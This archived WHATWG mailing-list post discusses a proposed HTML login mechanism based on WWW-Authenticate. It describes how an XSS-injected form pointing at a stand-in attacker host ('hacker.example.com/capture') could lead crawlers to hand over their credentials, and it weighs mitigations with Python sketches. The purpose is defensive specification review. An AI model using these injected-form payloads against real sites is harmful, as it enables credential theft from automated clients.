[whatwg] Solving the login/logout problem in HTML from Philip Taylor on 2008-11-26 (public-whatwg-archive@w3.org from November 2008)

From: Philip Taylor <excors+whatwg@gmail.com>
Date: Wed, 26 Nov 2008 16:57:48 +0000
Message-ID: <ea09c0d10811260857u7282c269ic641313dd1ec4d41@mail.gmail.com>
On Wed, Nov 26, 2008 at 10:12 AM, Ian Hickson <ian at hixie.ch> wrote:
> On Wed, 26 Nov 2008, Julian Reschke wrote:
>> Ian Hickson wrote:
>> > ...
>> > As can be seen in the feedback below, there is interest in improving the So
>> > when you get to a page that expects you to be logged in, it returns a 401
>> > with:
>> >
>> >    WWW-Authenticate: HTML form="login"
>> >
>> > ...and there must be a <form> element with name="login", which represents
>> > the form that must be submitted to log in.
>> > ...
>>
>> For security reasons, I'd prefer that to be "the <form> element",
>> instead of "a <form> element" -- having multiple copies of the name in
>> the same document should be considered a fatal error.
>
> Having multiple <form> elements with the same name is already an error.
>
> I'm not sure what you mean by "fatal" error. The spec precisely defines
> which form should be used in the case of multiple forms with the same
> name. Could you describe the attack scenario you are considering?

If I'm not misunderstanding things, there is a new attack scenario:

I post a comment on someone's blog, saying <a
href="/restricted-access.php?xsshole=<form
action=http://hacker.example.com/capture name=login><input
name=username><input name=password></form>">crawl me!</a>

On their blog's web server, restricted-access.php requires
authentication, and unauthenticated access results in a 401 with
'WWW-Authenticate: HTML form="login"' and the appropriate login form.
But inevitably there's some kind of XSS hole in that page, so
arbitrary markup can be inserted above the real login form. (Maybe
they pass an error message in a parameter, which will be displayed
above the form, but they forgot to escape the output.)

Their internal search engine crawler is configured to know a username
and password (and the form field names etc) for these restricted
areas. It follows the link from my blog comment, it notices the
WWW-Authenticate header, and like a good little bot it chooses to
parse the HTML page and find the matching form and fill in the fields
and submit the login details. But actually it's submitting my
XSS-inserted form, and sending the login details to me.
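
As a rough sketch of the scenario above: the crawler below picks the first <form> whose name matches the one given in WWW-Authenticate. Choosing the first match in document order is an assumption made for illustration (the thread only says the spec defines which form is used), and "/login.php" is a made-up action for the real form.

```python
from html.parser import HTMLParser


class FirstNamedForm(HTMLParser):
    """Records the action of the first <form> whose name attribute matches."""

    def __init__(self, name):
        super().__init__()
        self.name = name
        self.found = False
        self.action = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and not self.found and attrs.get("name") == self.name:
            self.found = True
            self.action = attrs.get("action")


def pick_login_action(page, form_name):
    """Return the action URL of the form a naive crawler would submit."""
    parser = FirstNamedForm(form_name)
    parser.feed(page)
    parser.close()
    return parser.action


# Page as served with the 401: the unescaped "xsshole" parameter is echoed
# above the real login form. "/login.php" is a hypothetical real action.
page = (
    '<p>Error: <form action="http://hacker.example.com/capture" name="login">'
    '<input name="username"><input name="password"></form></p>'
    '<form action="/login.php" name="login">'
    '<input name="username"><input name="password"></form>'
)

chosen_action = pick_login_action(page, "login")
```

Here chosen_action is the attacker's URL, because the injected form appears before the real one.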

XSS holes already cause various security vulnerabilities; but they
can't currently result in sensibly-written crawlers unwittingly
submitting their login details to arbitrary third parties, so this is
a new risk.

I can imagine a few ways to avoid this problem:

 1) Don't write any pages with XSS holes.
 2) Detect tampering by refusing to submit login details if >= 2 forms
match the name.
 3) Only submit login details to same-origin URLs, or to some other
restricted set.
 4) Configure the crawler with the form submission URL, as well as the
form field names and values, so it doesn't have to trust the HTML.
 5) Change WWW-Authenticate so it gives all the details (submission
URL, field names, etc), so nobody has to trust the HTML.

But (1) is not going to happen in reality, so we should try to
minimise the damage when XSS holes exist. (2) won't work because the
attacker could write '...?xsshole=...<!--' and the second form would
be hidden. (3) is more sensible; perhaps the spec should explicitly
note that you need to be quite careful about not submitting login
forms to third-party sites unless you're sure you trust them?
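
To illustrate why (2) can be sidestepped, here is a small sketch that counts the forms matching the name, with and without a trailing '<!--' in the injected markup. It assumes the page contains a later '-->' (here, a made-up footer comment) that ends the attacker's comment; how a parser treats a comment that is never closed varies, so that case is not shown. "/login.php" is again a hypothetical action.

```python
from html.parser import HTMLParser


class NamedFormCollector(HTMLParser):
    """Collects the action of every <form> whose name attribute matches."""

    def __init__(self, name):
        super().__init__()
        self.name = name
        self.actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("name") == self.name:
            self.actions.append(attrs.get("action"))


def login_form_actions(page, name="login"):
    collector = NamedFormCollector(name)
    collector.feed(page)
    collector.close()
    return collector.actions


INJECTED = '<form action="http://hacker.example.com/capture" name="login"></form>'
REAL_FORM = '<form action="/login.php" name="login"></form>'
FOOTER = "<!-- footer -->"  # hypothetical later comment in the real page

# Without the comment trick, two matching forms are visible and (2) would fire.
plain_actions = login_form_actions(INJECTED + REAL_FORM + FOOTER)

# With '<!--' appended to the injected markup, the real form is swallowed by
# the comment, so only the attacker's form is counted.
hidden_actions = login_form_actions(INJECTED + "<!--" + REAL_FORM + FOOTER)
```

In the second case only one form matches, so a "refuse if >= 2 forms match" check sees nothing unusual.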

But even with (3), I could write <a
href="/restricted-access.php?xsshole=<form
action=/public-pastebin.php>..."> and the crawler would send the login
details to somewhere on the same host where I could still read them
back, which doesn't seem great.
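
A minimal sketch of the same-origin check in (3), and of the limitation just described. The page URL "http://blog.example.com/..." is a made-up host for the blog; the check compares scheme, host and port after resolving the form action against the page URL.

```python
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return (scheme, host, port) for a URL, filling in default ports."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


def is_same_origin_submission(page_url, form_action):
    """True if the resolved form action has the same origin as the page."""
    target = urljoin(page_url, form_action)
    return origin(target) == origin(page_url)


# Hypothetical URL of the page that returned the 401.
page_url = "http://blog.example.com/restricted-access.php"

third_party_ok = is_same_origin_submission(
    page_url, "http://hacker.example.com/capture")
pastebin_ok = is_same_origin_submission(page_url, "/public-pastebin.php")
```

The third-party action is rejected, but the injected same-host pastebin action passes the check, which is the weakness of (3) on its own.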

So (4) is more sensible. You already have to configure the crawler
with the form field names, so you might as well tell it what URL to
submit to, and it shouldn't parse the HTML response or care about the
<form> element. (Then there's no need for WWW-Authenticate to even say
what the form name is.)
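
For comparison, (4) might look roughly like this: the crawler builds the login request purely from its own configuration and never looks at the returned HTML. The URL, field names and credentials below are all placeholders, and the request is only constructed here, not sent.

```python
from urllib.parse import urlencode
from urllib.request import Request

# Hypothetical crawler configuration; every value here is a placeholder.
LOGIN_CONFIG = {
    "submit_url": "https://blog.example.com/login.php",
    "fields": {"username": "crawler", "password": "s3cret"},
}


def build_login_request(config):
    """Build the login POST from configuration alone, ignoring page markup."""
    body = urlencode(config["fields"]).encode("ascii")
    return Request(
        config["submit_url"],
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


request = build_login_request(LOGIN_CONFIG)
```

Since nothing in the request depends on the 401 response body, markup injected through an XSS hole cannot redirect the credentials.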

(5) is basically the same, except it's late-binding the form details
rather than hardcoding them into the crawler's configuration, and so
it makes it easy to change the server-side login handling without
reconfiguring everyone's crawlers.
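
Purely as an illustration of (5), the sketch below parses a challenge that carries the submission URL and field names itself. The parameter names (action, username-field, password-field) are invented for this example; nothing in the thread or in any specification defines them.

```python
import re

# Matches name="value" pairs; quoted-string escapes are not handled.
_PARAM = re.compile(r'([A-Za-z][A-Za-z0-9-]*)="([^"]*)"')


def parse_challenge(header_value):
    """Split a WWW-Authenticate value into (scheme, {param: value})."""
    scheme, _, rest = header_value.partition(" ")
    return scheme, dict(_PARAM.findall(rest))


# Hypothetical header value; the parameter names are assumptions.
header = ('HTML action="/login.php", username-field="username", '
          'password-field="password"')

scheme, params = parse_challenge(header)
```

A crawler could then combine params with its configured credentials, without trusting any <form> element in the response body.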

(But the cost of the potential solutions to the vulnerability might be
greater than the cost of the vulnerability, so it might not be worth
doing anything - I don't have a useful opinion on that.)

-- 
Philip Taylor
excors at gmail.com
Received on Wednesday, 26 November 2008 08:57:48 UTC